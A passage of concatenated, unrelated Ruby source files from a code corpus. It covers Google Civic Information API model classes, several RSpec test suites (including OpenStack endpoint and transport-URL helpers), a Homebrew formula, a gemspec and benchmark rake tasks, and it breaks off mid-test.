# @return [Google::Apis::CivicinfoV2::SimpleAddressType]
attr_accessor :normalized_input
# Elected offices referenced by the divisions listed above. Will only be present
# if includeOffices was true in the request.
# Corresponds to the JSON property `offices`
# @return [Array<Google::Apis::CivicinfoV2::Office>]
attr_accessor :offices
# Officials holding the offices listed above. Will only be present if
# includeOffices was true in the request.
# Corresponds to the JSON property `officials`
# @return [Array<Google::Apis::CivicinfoV2::Official>]
attr_accessor :officials
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@divisions = args[:divisions] if args.key?(:divisions)
@kind = args[:kind] if args.key?(:kind)
@normalized_input = args[:normalized_input] if args.key?(:normalized_input)
@offices = args[:offices] if args.key?(:offices)
@officials = args[:officials] if args.key?(:officials)
end
end
# A simple representation of an address.
class SimpleAddressType
include Google::Apis::Core::Hashable
# The city or town for the address.
# Corresponds to the JSON property `city`
# @return [String]
attr_accessor :city
# The street name and number of this address.
# Corresponds to the JSON property `line1`
# @return [String]
attr_accessor :line1
# The second line the address, if needed.
# Corresponds to the JSON property `line2`
# @return [String]
attr_accessor :line2
# The third line of the address, if needed.
# Corresponds to the JSON property `line3`
# @return [String]
attr_accessor :line3
# The name of the location.
# Corresponds to the JSON property `locationName`
# @return [String]
attr_accessor :location_name
# The US two letter state abbreviation of the address.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# The US Postal Zip Code of the address.
# Corresponds to the JSON property `zip`
# @return [String]
attr_accessor :zip
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@city = args[:city] if args.key?(:city)
@line1 = args[:line1] if args.key?(:line1)
@line2 = args[:line2] if args.key?(:line2)
@line3 = args[:line3] if args.key?(:line3)
@location_name = args[:location_name] if args.key?(:location_name)
@state = args[:state] if args.key?(:state)
@zip = args[:zip] if args.key?(:zip)
end
end
# Contains information about the data source for the element containing it.
class Source
include Google::Apis::Core::Hashable
# The name of the data source.
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Whether this data comes from an official government source.
# Corresponds to the JSON property `official`
# @return [Boolean]
attr_accessor :official
alias_method :official?, :official
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@name = args[:name] if args.key?(:name)
@official = args[:official] if args.key?(:official)
end
end
# A request for information about a voter.
class VoterInfoRequest
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `contextParams`
# @return [Google::Apis::CivicinfoV2::ContextParams]
attr_accessor :context_params
#
# Corresponds to the JSON property `voterInfoSegmentResult`
# @return [Google::Apis::CivicinfoV2::VoterInfoSegmentResult]
attr_accessor :voter_info_segment_result
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@context_params = args[:context_params] if args.key?(:context_params)
@voter_info_segment_result = args[:voter_info_segment_result] if args.key?(:voter_info_segment_result)
end
end
# The result of a voter info lookup query.
class VoterInfoResponse
include Google::Apis::Core::Hashable
# Contests that will appear on the voter's ballot.
# Corresponds to the JSON property `contests`
# @return [Array<Google::Apis::CivicinfoV2::Contest>]
attr_accessor :contests
# Locations where a voter is eligible to drop off a completed ballot. The voter
# must have received and completed a ballot prior to arriving at the location.
# The location may not have ballots available on the premises. These locations
# could be open on or before election day as indicated in the pollingHours field.
# Corresponds to the JSON property `dropOffLocations`
# @return [Array<Google::Apis::CivicinfoV2::PollingLocation>]
attr_accessor :drop_off_locations
# Locations where the voter is eligible to vote early, prior to election day.
# Corresponds to the JSON property `earlyVoteSites`
# @return [Array<Google::Apis::CivicinfoV2::PollingLocation>]
attr_accessor :early_vote_sites
# Information about the election that was queried.
# Corresponds to the JSON property `election`
# @return [Google::Apis::CivicinfoV2::Election]
attr_accessor :election
# Identifies what kind of resource this is. Value: the fixed string "civicinfo#
# voterInfoResponse".
# Corresponds to the JSON property `kind`
# @return [String]
attr_accessor :kind
# Specifies whether voters in the precinct vote only by mailing their ballots (
# with the possible option of dropping off their ballots as well).
# Corresponds to the JSON property `mailOnly`
# @return [Boolean]
attr_accessor :mail_only
alias_method :mail_only?, :mail_only
# A simple representation of an address.
# Corresponds to the JSON property `normalizedInput`
# @return [Google::Apis::CivicinfoV2::SimpleAddressType]
attr_accessor :normalized_input
# If no election ID was specified in the query, and there was more than one
# election with data for the given voter, this will contain information about
# the other elections that could apply.
# Corresponds to the JSON property `otherElections`
# @return [Array<Google::Apis::CivicinfoV2::Election>]
attr_accessor :other_elections
# Locations where the voter is eligible to vote on election day.
# Corresponds to the JSON property `pollingLocations`
# @return [Array<Google::Apis::CivicinfoV2::PollingLocation>]
attr_accessor :polling_locations
#
# Corresponds to the JSON property `precinctId`
# @return [String]
attr_accessor :precinct_id
# Local Election Information for the state that the voter votes in. For the US,
# there will only be one element in this array.
# Corresponds to the JSON property `state`
# @return [Array<Google::Apis::CivicinfoV2::AdministrationRegion>]
attr_accessor :state
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@contests = args[:contests] if args.key?(:contests)
@drop_off_locations = args[:drop_off_locations] if args.key?(:drop_off_locations)
@early_vote_sites = args[:early_vote_sites] if args.key?(:early_vote_sites)
@election = args[:election] if args.key?(:election)
@kind = args[:kind] if args.key?(:kind)
@mail_only = args[:mail_only] if args.key?(:mail_only)
@normalized_input = args[:normalized_input] if args.key?(:normalized_input)
@other_elections = args[:other_elections] if args.key?(:other_elections)
@polling_locations = args[:polling_locations] if args.key?(:polling_locations)
@precinct_id = args[:precinct_id] if args.key?(:precinct_id)
@state = args[:state] if args.key?(:state)
end
end
#
class VoterInfoSegmentResult
include Google::Apis::Core::Hashable
#
# Corresponds to the JSON property `generatedMillis`
# @return [String]
attr_accessor :generated_millis
#
# Corresponds to the JSON property `postalAddress`
# @return [Google::Apis::CivicinfoV2::PostalAddress]
attr_accessor :postal_address
# A request for information about a voter.
# Corresponds to the JSON property `request`
# @return [Google::Apis::CivicinfoV2::VoterInfoRequest]
attr_accessor :request
# The result of a voter info lookup query.
# Corresponds to the JSON property `response`
# @return [Google::Apis::CivicinfoV2::VoterInfoResponse]
attr_accessor :response
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@generated_millis = args[:generated_millis] if args.key?(:generated_millis)
@postal_address = args[:postal_address] if args.key?(:postal_address)
@request = args[:request] if args.key?(:request)
@response = args[:response] if args.key?(:response)
end
end
end
end
end
| 40.702667 | 151 | 0.630311 |
7aa202875793a1cbdc105b704c6b66cac4236371 | 882 | require 'spec_helper'
describe Gitlab::FileResponse do
before do
@file_response = described_class.new StringIO.new('', 'rb+')
end
context '.empty?' do
it 'returns false' do
expect(@file_response.empty?).to be false
end
end
context '.to_hash' do
it 'has `filename` key and `data` key' do
h = @file_response.to_hash
expect(h).to be_key(:filename)
expect(h).to be_key(:data)
end
end
context '.parse_headers!' do
it 'parses headers' do
@file_response.parse_headers!('Content-Disposition' => 'attachment; filename=artifacts.zip')
expect(@file_response.filename).to eq 'artifacts.zip'
end
it 'handles quoted filenames' do
@file_response.parse_headers!('Content-Disposition' => 'attachment; filename="artifacts.zip"')
expect(@file_response.filename).to eq 'artifacts.zip'
end
end
end
| 25.941176 | 100 | 0.673469 |
035a0edbf7dac24eb74abbc0d336bf84c361e8d6 | 455 | # frozen_string_literal: true
module Orchestration
module Services
module Database
module Adapters
class Sqlite3
def name
'sqlite3'
end
def credentials
{
'username' => '',
'password' => '',
'database' => 'healthcheck'
}
end
def errors
[]
end
end
end
end
end
end
| 16.25 | 41 | 0.426374 |
01c6a55f243d8bec43d7e2c6e51038d00712e165 | 124 | require 'test_helper'
class BakerMailerTest < ActionMailer::TestCase
# test "the truth" do
# assert true
# end
end
| 15.5 | 46 | 0.709677 |
261ddc7a39784ecf6b3aa4a736c8056a570f96ee | 339 | class PartitionWorld < Partition
class PartitionTree < Tree
def init(partition, item)
super()
@universeSize = partition.universeSize
@partition = partition
@item = item
@parent = nil
@rank = 0
@count = 1
end
attr_reader :partition
attr_accessor :parent
attr_accessor :rank
attr_accessor :count
end
end
| 18.833333 | 41 | 0.699115 |
1d9669b7818a8d26c716e725381dc88a29eb0a6c | 912 | class User < ApplicationRecord
has_secure_password
has_secure_token :session_token
before_save :downcase_email
has_many :food_pantries
validates :email, format: {with: URI::MailTo::EMAIL_REGEXP}, presence: true, uniqueness: true
def self.authenticate_by(attributes)
passwords, identifiers = attributes.to_h.partition do |name, value|
!has_attribute?(name) && has_attribute?("#{name}_digest")
end.map(&:to_h)
raise ArgumentError, "One or more password arguments are required" if passwords.empty?
raise ArgumentError, "One or more finder arguments are required" if identifiers.empty?
if (record = find_by(identifiers))
record if passwords.count { |name, value| record.public_send(:"authenticate_#{name}", value) } == passwords.size
else
new(passwords)
nil
end
end
private
def downcase_email
self.email = email.downcase
end
end
| 28.5 | 118 | 0.719298 |
bbf2de6bbf13ce6338fbdc796b9cd45cedf6e310 | 2,308 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../../../shared/enumerator/with_index', __FILE__)
require File.expand_path('../../enumerable/shared/enumeratorized', __FILE__)
describe "Enumerator#with_index" do
it_behaves_like(:enum_with_index, :with_index)
it_behaves_like(:enumeratorized_with_origin_size, :with_index, [1,2,3].select)
it "returns a new Enumerator when no block is given" do
enum1 = [1,2,3].select
enum2 = enum1.with_index
enum2.should be_an_instance_of(enumerator_class)
enum1.should_not === enum2
end
it "accepts an optional argument when given a block" do
lambda do
@enum.with_index(1) { |f| f}
end.should_not raise_error(ArgumentError)
end
it "accepts an optional argument when not given a block" do
lambda do
@enum.with_index(1)
end.should_not raise_error(ArgumentError)
end
it "numbers indices from the given index when given an offset but no block" do
@enum.with_index(1).to_a.should == [[1,1], [2,2], [3,3], [4,4]]
end
it "numbers indices from the given index when given an offset and block" do
acc = []
@enum.with_index(1) {|e,i| acc << [e,i] }
acc.should == [[1,1], [2,2], [3,3], [4,4]]
end
it "raises a TypeError when the argument cannot be converted to numeric" do
lambda do
@enum.with_index('1') {|*i| i}
end.should raise_error(TypeError)
end
it "converts non-numeric arguments to Integer via #to_int" do
(o = mock('1')).should_receive(:to_int).and_return(1)
@enum.with_index(o).to_a.should == [[1,1], [2,2], [3,3], [4,4]]
end
it "coerces the given numeric argument to an Integer" do
@enum.with_index(1.678).to_a.should == [[1,1], [2,2], [3,3], [4,4]]
res = []
@enum.with_index(1.001) { |*x| res << x}
res.should == [[1,1], [2,2], [3,3], [4,4]]
end
it "treats nil argument as no argument" do
@enum.with_index(nil).to_a.should == [[1,0], [2,1], [3,2], [4,3]]
res = []
@enum.with_index(nil) { |*x| res << x}
res.should == [[1,0], [2,1], [3,2], [4,3]]
end
it "accepts negative argument" do
@enum.with_index(-1).to_a.should == [[1,-1], [2,0], [3,1], [4,2]]
res = []
@enum.with_index(-1) { |*x| res << x}
res.should == [[1,-1], [2,0], [3,1], [4,2]]
end
end
| 31.616438 | 80 | 0.62565 |
b9c5217f9e4927985d83f3f9944d3a0f309892b3 | 305 | $LOAD_PATH.unshift(File.join(File.dirname(__FILE__)))
require 'net/http'
require 'slack-ruby-bot'
require 'socket'
require 'yaml'
require 'slackerbutler/version'
require 'slackerbutler/commands'
require 'slackerbutler/butler'
require 'slackerbutler/bot'
require 'slackerbutler/help'
SlackerButler.run!
| 20.333333 | 53 | 0.8 |
1aac0b1e33e9f06862221e4ee694d836827b0aba | 2,243 | # coding: UTF-8
require_relative '../spec_helper'
describe 'cerner_splunk::heavy_forwarder' do
subject do
runner = ChefSpec::SoloRunner.new(platform: 'centos', version: '6.8') do |node|
node.override['splunk']['config']['clusters'] = ['cerner_splunk/cluster']
node.run_state['cerner_splunk'] = {}
node.run_state['cerner_splunk']['splunk_forwarder_migrate'] = splunk_installed
end
runner.converge(described_recipe)
end
let(:cluster_config) do
{
'receivers' => ['33.33.33.20'],
'license_uri' => nil,
'receiver_settings' => {
'splunktcp' => {
'port' => '9997'
}
},
'indexes' => 'cerner_splunk/indexes'
}
end
let(:splunk_installed) { nil }
before do
allow(ChefVault::Item).to receive(:data_bag_item_type).and_return(:normal)
stub_data_bag_item('cerner_splunk', 'cluster').and_return(cluster_config)
stub_data_bag_item('cerner_splunk', 'indexes').and_return({})
allow(Dir).to receive(:exist?).and_call_original
allow(Dir).to receive(:exist?).with('/opt/splunkforwarder').and_return(splunk_installed)
end
after do
CernerSplunk.reset
end
context 'when splunkforwarder is installed' do
let(:splunk_installed) { true }
it 'includes cerner_splunk::_migrate_forwarder recipe' do
expect(subject).to include_recipe('cerner_splunk::_migrate_forwarder')
end
it 'runs initialize-splunk-backup-artifacts ruby block' do
expect(subject).to run_ruby_block('initialize-splunk-backup-artifacts')
end
end
context 'when splunkforwarder is not installed' do
let(:splunk_installed) { false }
it 'does not include cerner_splunk::_migrate_forwarder recipe' do
expect(subject).not_to include_recipe('cerner_splunk::_migrate_forwarder')
end
it 'does not run initialize-splunk-backup-artifacts ruby block' do
expect(subject).not_to run_ruby_block('initialize-splunk-backup-artifacts')
end
end
it 'includes default cerner_splunk::_install recipe' do
expect(subject).to include_recipe('cerner_splunk::_install')
end
it 'includes default cerner_splunk::_start recipe' do
expect(subject).to include_recipe('cerner_splunk::_start')
end
end
| 29.906667 | 92 | 0.700401 |
919ef6d71a45349343cbc79230dbc0371ea64b21 | 3,097 | require 'spec_helper'
module RailsParamValidation
RSpec.describe ObjectValidator do
before(:all) do
@validator = ValidatorFactory.create({ name: String, amount: Float })
end
it 'should accept valid hashes' do
match = @validator.matches?([], name: "John Doe", amount: 42.0)
expect(match.matches?).to eq(true)
expect(match.value).to eq(name: "John Doe", amount: 42.0)
end
it 'should reject hashes with missing keys' do
match = @validator.matches?([], name: "John Doe")
expect(match.matches?).to eq(false)
expect(match.value).to eq(nil)
expect(match.errors).to eq([{ path: [:amount], message: "Expected a float" }])
end
it 'should reject hashes with additional keys' do
match = @validator.matches?([], name: "John Doe", amount: 42.0, age: 23)
expect(match.matches?).to eq(false)
expect(match.value).to eq(nil)
expect(match.errors).to eq([{ path: [:age], message: "Unknown property" }])
end
it 'should return symbols as keys if schema defines symbols if strings are given' do
match = @validator.matches?([], "name" => "John Doe", "amount" => 42.0)
expect(match.errors).to eq([])
expect(match.matches?).to eq(true)
expect(match.value).to eq({ name: "John Doe", amount: 42.0 })
end
it 'should return symbols as keys if schema defines symbols if symbols are given' do
match = @validator.matches?([], name: "John Doe", amount: 42.0)
expect(match.errors).to eq([])
expect(match.matches?).to eq(true)
expect(match.value).to eq({ name: "John Doe", amount: 42.0 })
end
it 'should return strings as keys if schema defines strings if strings are given' do
@validator = ValidatorFactory.create({ "name" => String, "amount" => Float })
match = @validator.matches?([], "name" => "John Doe", "amount" => 42.0)
expect(match.errors).to eq([])
expect(match.matches?).to eq(true)
expect(match.value).to eq({ "name" => "John Doe", "amount" => 42.0 })
end
it 'should return strings as keys if schema defines strings if symbols are given' do
@validator = ValidatorFactory.create({ "name" => String, "amount" => Float })
match = @validator.matches?([], name: "John Doe", amount: 42.0)
expect(match.errors).to eq([])
expect(match.matches?).to eq(true)
expect(match.value).to eq({ "name" => "John Doe", "amount" => 42.0 })
end
it 'should not accept strings' do
match = @validator.matches?([], "John Doe")
expect(match.matches?).to eq(false)
expect(match.errors).to eq([{ path: [], message: "Expected an object" }])
expect(match.value).to eq(nil)
end
it 'should not accept arrays' do
match = @validator.matches?([], [])
expect(match.matches?).to eq(false)
expect(match.errors).to eq([{ path: [], message: "Expected an object" }])
expect(match.value).to eq(nil)
end
it 'should not accept floats' do
match = @validator.matches?([], 42.5)
expect(match.matches?).to eq(false)
expect(match.errors).to eq([{ path: [], message: "Expected an object" }])
expect(match.value).to eq(nil)
end
end
end | 32.6 | 86 | 0.64514 |
034b706f34eb9ac020fe4ab994d02fe4c13d033f | 1,011 | {
matrix_id: '105',
name: 'can_715',
group: 'HB',
description: 'SYMMETRIC PATTERN FROM CANNES,LUCIEN MARRO,JUNE 1981.',
author: 'L. Marro',
editor: 'I. Duff, R. Grimes, J. Lewis',
date: '1981',
kind: 'structural problem',
problem_2D_or_3D: '1',
num_rows: '715',
num_cols: '715',
nonzeros: '6665',
num_explicit_zeros: '0',
num_strongly_connected_components: '1',
num_dmperm_blocks: '1',
structural_full_rank: 'true',
structural_rank: '715',
pattern_symmetry: '1.000',
numeric_symmetry: '1.000',
rb_type: 'binary',
structure: 'symmetric',
cholesky_candidate: 'yes',
positive_definite: 'no',
norm: '1.531015e+01',
min_singular_value: '1.287771e-17',
condition_number: '1188887424375131136',
svd_rank: '702',
sprank_minus_rank: '13',
null_space_dimension: '13',
full_numerical_rank: 'no',
svd_gap: '3472187067432.159668',
image_files: 'can_715.png,can_715_svd.png,can_715_graph.gif,',
}
| 28.885714 | 73 | 0.645895 |
# Homebrew formula for the `envkey-fetch` CLI (https://www.envkey.com),
# built from the tagged source tarball with the Go toolchain.
class EnvkeyFetch < Formula
  desc "Give it an ENVKEY, get back decrypted config as json"
  homepage "https://www.envkey.com"
  url "https://github.com/envkey/envkey-fetch/archive/v1.2.8.tar.gz"
  sha256 "4d1f55ba8d1c024ddc49752979439d035beb890ddd1fe8b40805aa048c5a5bee"
  # Go is only required at build time, not at runtime.
  depends_on "go" => :build
  def install
    # Use an isolated GOPATH inside the sandboxed build directory and force
    # module-aware mode so the build does not depend on the host Go setup.
    ENV["GOPATH"] = buildpath/"src"
    ENV["GO111MODULE"] = "on"
    system "go", "build", "-o", "envkey-fetch", "main.go"
    bin.install "envkey-fetch"
  end
  test do
    # Smoke tests: a bare invocation must exit 0; an invalid key ("000") is
    # expected to exit with status 1 (the second argument to shell_output).
    shell_output "#{bin}/envkey-fetch"
    shell_output "#{bin}/envkey-fetch 000", 1
  end
end
1c6965105fe6ba7a503ea35d25e6e6cef165f1aa | 745 | # frozen_string_literal: true
require 'active_support'
require 'active_record'
require 'delayed_job'
require 'delayed_job_active_record'
require 'delayed/job_groups/compatibility'
require 'delayed/job_groups/job_extensions'
require 'delayed/job_groups/job_group'
require 'delayed/job_groups/plugin'
require 'delayed/job_groups/yaml_loader'
require 'delayed/job_groups/version'
# Only wire into the ActiveRecord backend when it has actually been loaded.
if defined?(Delayed::Backend::ActiveRecord)
  if defined?(Rails::Railtie)
    # Postpone initialization to railtie for correct order
    require 'delayed/job_groups/railtie'
  else
    # Do the same as in the railtie
    Delayed::Backend::ActiveRecord::Job.include(Delayed::JobGroups::JobExtensions)
  end
end
# Register the plugin so Delayed::Worker lifecycle hooks fire for job groups.
Delayed::Worker.plugins << Delayed::JobGroups::Plugin
| 28.653846 | 82 | 0.795973 |
5d28f822bd381b65f1828c9dc8682de192893473 | 1,388 | # -*- encoding: utf-8 -*-
# stub: jbuilder 2.4.1 ruby lib
Gem::Specification.new do |s|
  # NOTE: this is a RubyGems-generated "stub" specification (see the
  # "# stub:" header above); prefer regenerating over hand-editing values.
  s.name = "jbuilder".freeze
  s.version = "2.4.1"
  s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib".freeze]
  s.authors = ["David Heinemeier Hansson".freeze, "Pavel Pravosud".freeze]
  s.date = "2016-02-09"
  s.email = ["[email protected]".freeze, "[email protected]".freeze]
  s.homepage = "https://github.com/rails/jbuilder".freeze
  s.licenses = ["MIT".freeze]
  s.required_ruby_version = Gem::Requirement.new(">= 1.9.3".freeze)
  s.rubygems_version = "2.6.8".freeze
  s.summary = "Create JSON structures via a Builder-style DSL".freeze
  s.installed_by_version = "2.6.8" if s.respond_to? :installed_by_version
  # The branching below is generated boilerplate that declares the same
  # dependencies under old and new RubyGems APIs.
  if s.respond_to? :specification_version then
    s.specification_version = 4
    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      s.add_runtime_dependency(%q<activesupport>.freeze, ["< 5.1", ">= 3.0.0"])
      s.add_runtime_dependency(%q<multi_json>.freeze, ["~> 1.2"])
    else
      s.add_dependency(%q<activesupport>.freeze, ["< 5.1", ">= 3.0.0"])
      s.add_dependency(%q<multi_json>.freeze, ["~> 1.2"])
    end
  else
    s.add_dependency(%q<activesupport>.freeze, ["< 5.1", ">= 3.0.0"])
    s.add_dependency(%q<multi_json>.freeze, ["~> 1.2"])
  end
end
| 38.555556 | 112 | 0.663545 |
26a6e18a775053fe56c8ae4c382a9603a68da079 | 373 | require 'fileutils'
require 'pathname'
require 'fakefs/base'
require 'fakefs/fake/file'
require 'fakefs/fake/dir'
require 'fakefs/fake/inode'
require 'fakefs/fake/symlink'
require 'fakefs/file_system'
require 'fakefs/fileutils'
require 'fakefs/file'
require 'fakefs/file_test'
require 'fakefs/dir'
require 'fakefs/globber'
require 'fakefs/pathname'
require 'fakefs/kernel'
| 23.3125 | 29 | 0.793566 |
4a38cb9834e3048fa9a9c5ddae7117e5c1cb9ee8 | 6,851 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require_relative "../benchmarking"
# Rake entry points for the client benchmarks.
#
# Every task follows the same shape: load the client, iterate the run matrix
# (optionally filtered via the `matrix` environment variable), execute one
# measurement per run, and print a banner plus the result. The shared helper
# below captures that shape so each task only declares its measurement.
#
# The benchmark class (:Simple or :Complex) is resolved lazily inside the
# helper — i.e. after `require 'elasticsearch'` — matching the load order of
# the previous hand-written tasks.
def run_benchmark(task_type, measure, banner)
  require 'elasticsearch'
  Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
    task = Elasticsearch::Benchmarking.const_get(task_type).new(run)
    puts "#{'*' * 5} #{banner} #{'*' * 5} \n"
    puts "#{task.run(measure)}"
  end
end

namespace :benchmark do
  namespace :simple do
    # task name => [phrase used in the rake description, banner printed per run]
    SIMPLE_BENCHMARKS = {
      ping: ['ping', 'PING'],
      create_index: ['create index', 'CREATE INDEX'],
      index_document_small: ['index small document', 'INDEX SMALL DOCUMENT'],
      index_document_large: ['index large document', 'INDEX LARGE DOCUMENT'],
      get_document_small: ['get small document', 'GET SMALL DOCUMENT'],
      get_document_large: ['get large document', 'GET LARGE DOCUMENT'],
      search_document_small: ['search small document', 'SEARCH SMALL DOCUMENT'],
      search_document_large: ['search large document', 'SEARCH LARGE DOCUMENT'],
      update_document: ['update document', 'UPDATE DOCUMENT']
    }.freeze

    SIMPLE_BENCHMARKS.each do |measure, (phrase, banner)|
      desc "Run the '#{phrase}' benchmark test"
      task measure do
        run_benchmark(:Simple, measure, banner)
      end
    end

    desc "Run the 'index small document' benchmark test with patron adapter"
    task :index_document_small_patron do
      require 'elasticsearch'
      Elasticsearch::Benchmarking.each_run(ENV['matrix']) do |run|
        begin
          require 'patron'
        rescue LoadError
          # Patron is an optional MRI-only HTTP adapter; skip when missing.
          puts "Patron not loaded, skipping test"
        else
          task = Elasticsearch::Benchmarking::Simple.new(run, :patron)
          puts "#{'*' * 5} INDEX SMALL DOCUMENT, PATRON #{'*' * 5} \n"
          puts "#{task.run(:index_document_small)}"
        end
      end
    end

    desc "Run all simple benchmark tests"
    task :all, [:matrix] do |_t, args|
      %w[ benchmark:simple:ping
          benchmark:simple:create_index
          benchmark:simple:index_document_small
          benchmark:simple:index_document_small_patron
          benchmark:simple:index_document_large
          benchmark:simple:get_document_small
          benchmark:simple:get_document_large
          benchmark:simple:search_document_small
          benchmark:simple:search_document_large
          benchmark:simple:update_document
        ].each do |task_name|
        begin
          require 'elasticsearch'
          Rake::Task[task_name].invoke(*args)
        rescue => ex
          # One failing benchmark must not abort the rest of the suite.
          puts "Error in task [#{task_name}], #{ex.inspect}"
          next
        end
      end
    end

    # namespace :noop do
    #
    #   desc "Run the \'search small document\' benchmark test with the noop plugin"
    #   task :search_document_small do
    #     puts "SIMPLE REQUEST BENCHMARK:: SEARCH SMALL DOCUMENT WITH NOOP PLUGIN"
    #     Elasticsearch::Benchmarking::Simple.new.run(:search_document_small, noop: true)
    #   end
    # end
  end

  namespace :complex do
    # task name => [phrase used in the rake description, banner printed per run]
    COMPLEX_BENCHMARKS = {
      index_documents: ['index documents', 'INDEX DOCUMENTS'],
      search_documents: ['search documents', 'SEARCH DOCUMENTS']
    }.freeze

    COMPLEX_BENCHMARKS.each do |measure, (phrase, banner)|
      desc "Run the '#{phrase}' benchmark test"
      task measure do
        run_benchmark(:Complex, measure, banner)
      end
    end

    desc "Run all complex benchmark tests"
    task :all do
      # NOTE: previously only index_documents ran here despite the "all" name;
      # search_documents is now included as well.
      %w[ benchmark:complex:index_documents
          benchmark:complex:search_documents
        ].each do |task_name|
        require 'elasticsearch'
        Rake::Task[task_name].invoke
      end
    end
  end
end
| 35.133333 | 89 | 0.636695 |
87d9adade0409230b9767e9cfce5e1f783af7858 | 8,922 | # encoding: UTF-8
require_relative 'spec_helper'
require ::File.join ::File.dirname(__FILE__), '..', 'libraries', 'uri'
require ::File.join ::File.dirname(__FILE__), '..', 'libraries', 'endpoints'
describe 'openstack-common::default' do
describe 'Openstack endpoints' do
let(:runner) { ChefSpec::SoloRunner.new(CHEFSPEC_OPTS) }
let(:node) { runner.node }
let(:chef_run) { runner.converge(described_recipe) }
let(:subject) { Object.new.extend(Openstack) }
%w(public internal admin).each do |ep_type|
describe "#{ep_type}_endpoint" do
it 'fails with a NoMethodError when no openstack.endpoints in node attrs' do
allow(subject).to receive(:node).and_return({})
expect do
subject.send("#{ep_type}_endpoint", 'someservice')
end.to raise_error(NoMethodError)
end
it 'fails with a NoMethodError when no endpoint was found' do
allow(subject).to receive(:node).and_return(node)
expect do
subject.send("#{ep_type}_endpoint", 'someservice')
end.to raise_error(NoMethodError)
end
it 'handles a URI needing escaped' do
uri_hash = {
'openstack' => {
'endpoints' => {
ep_type => {
'compute-api' => {
'uri' => 'http://localhost:8080/v2/%(tenant_id)s',
},
},
},
},
}
allow(subject).to receive(:node).and_return(uri_hash)
expect(
subject.send("#{ep_type}_endpoint", 'compute-api').path
).to eq('/v2/%25(tenant_id)s')
end
it 'returns endpoint URI object when uri key in endpoint hash' do
uri_hash = {
'openstack' => {
'endpoints' => {
ep_type => {
'compute-api' => {
'uri' => 'http://localhost:1234/path',
},
},
},
},
}
allow(subject).to receive(:node).and_return(uri_hash)
expect(
subject.send("#{ep_type}_endpoint", 'compute-api').port
).to eq(1234)
end
it 'returns endpoint URI string when uri key in endpoint hash and host also in hash' do
uri_hash = {
'openstack' => {
'endpoints' => {
ep_type => {
'compute-api' => {
'uri' => 'http://localhost',
'host' => 'ignored',
},
},
},
},
}
allow(subject).to receive(:node).and_return(uri_hash)
expect(subject.send("#{ep_type}_endpoint", 'compute-api').to_s).to eq('http://localhost')
end
it 'returns endpoint URI object when uri key not in endpoint hash but host is in hash' do
expect(subject).to receive(:uri_from_hash).with('host' => 'localhost', 'port' => '1234')
uri_hash = {
'openstack' => {
'endpoints' => {
ep_type => {
'compute-api' => {
'host' => 'localhost',
'port' => '1234',
},
},
},
},
}
allow(subject).to receive(:node).and_return(uri_hash)
subject.send("#{ep_type}_endpoint", 'compute-api')
end
end
end
describe 'transport_url' do
it do
allow(subject).to receive(:node).and_return(chef_run.node)
allow(subject).to receive(:get_password)
.with('user', 'openstack')
.and_return('mypass')
expected = 'rabbit://openstack:[email protected]:5672/'
expect(subject.rabbit_transport_url('compute')).to eq(expected)
end
it do
node.set['openstack']['mq']['service_type'] = 'rabbit'
node.set['openstack']['mq']['cluster'] = true
node.set['openstack']['mq']['compute']['rabbit']['userid'] = 'rabbit2'
node.set['openstack']['endpoints']['mq']['port'] = 1234
node.set['openstack']['mq']['servers'] = %w(10.0.0.1 10.0.0.2 10.0.0.3)
node.set['openstack']['mq']['vhost'] = '/anyhost'
allow(subject).to receive(:node).and_return(chef_run.node)
allow(subject).to receive(:get_password)
.with('user', 'rabbit2')
.and_return('mypass2')
expected = 'rabbit://rabbit2:[email protected]:1234,rabbit2:[email protected]:1234,rabbit2:[email protected]:1234/anyhost'
expect(subject.rabbit_transport_url('compute')).to eq(expected)
end
end
describe '#db' do
it 'returns nil when no openstack.db not in node attrs' do
allow(subject).to receive(:node).and_return({})
expect(subject.db('nonexisting')).to be_nil
end
it 'returns nil when no such service was found' do
allow(subject).to receive(:node).and_return(chef_run.node)
expect(subject.db('nonexisting')).to be_nil
end
it 'returns db info hash when service found' do
allow(subject).to receive(:node).and_return(chef_run.node)
expect(subject.db('compute')['host']).to eq('127.0.0.1')
expect(subject.db('compute').key?('uri')).to be_falsey
end
end
describe '#db_uri' do
it 'returns nil when no openstack.db not in node attrs' do
allow(subject).to receive(:node).and_return({})
expect(subject.db_uri('nonexisting', 'user', 'pass')).to be_nil
end
it 'returns nil when no such service was found' do
allow(subject).to receive(:node).and_return(chef_run.node)
expect(
subject.db_uri('nonexisting', 'user', 'pass')
).to be_nil
end
it 'returns compute db info hash when service found for default mysql' do
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3306/nova?charset=utf8'
expect(
subject.db_uri('compute', 'user', 'pass')
).to eq(expected)
end
it 'returns network db info hash when service found for sqlite with options' do
node.set['openstack']['db']['service_type'] = 'sqlite'
node.set['openstack']['db']['options'] = { 'sqlite' => '?options' }
node.set['openstack']['db']['network']['path'] = 'path'
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'sqlite:///path?options'
expect(
subject.db_uri('network', 'user', 'pass')
).to eq(expected)
end
it 'returns compute db info hash when service found for mariadb' do
